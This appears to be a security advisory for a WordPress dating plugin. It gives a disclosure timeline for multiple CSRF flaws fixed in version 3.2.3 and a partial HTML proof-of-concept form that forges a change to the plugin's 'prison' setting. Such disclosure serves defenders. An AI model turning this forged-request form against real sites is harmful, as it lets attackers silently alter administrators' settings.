The plugins is affected by multiple CSRF issues, allowing arbitrary changes of the plugin's settings.
November 3rd, 2019 - WordPress Plugin Team Notified
November 5th, 2019 - WP Plugins Team acknowledgments of the issue.
December 2nd, 2019 - v3.2.2 released, none of the CSRF have been fixed as the nonces have only been set in AJAX actions.
December 8th, 2019 - WP Plugins Team notified again
December 10th, 2019 - Plugin closed for review
December 11th, 2019 - v3.2.3 Released, fixing the issues
December 22nd, Plugin re-opened
|Proof of Concept
/wp-admin/admin.php?page=rencprofile (Update Member Profile, Add/Remove Language)
/wp-admin/admin.php?page=renccountry (Add/Remove Language)
For example, the below CSRF attack will change the "Number of days in jail (deleted account)" setting to 7
<form action="https://[WP]/wp-admin/admin.php?page=rencontre.php" method="POST">
<input type="hidden" name="prison" value="7" />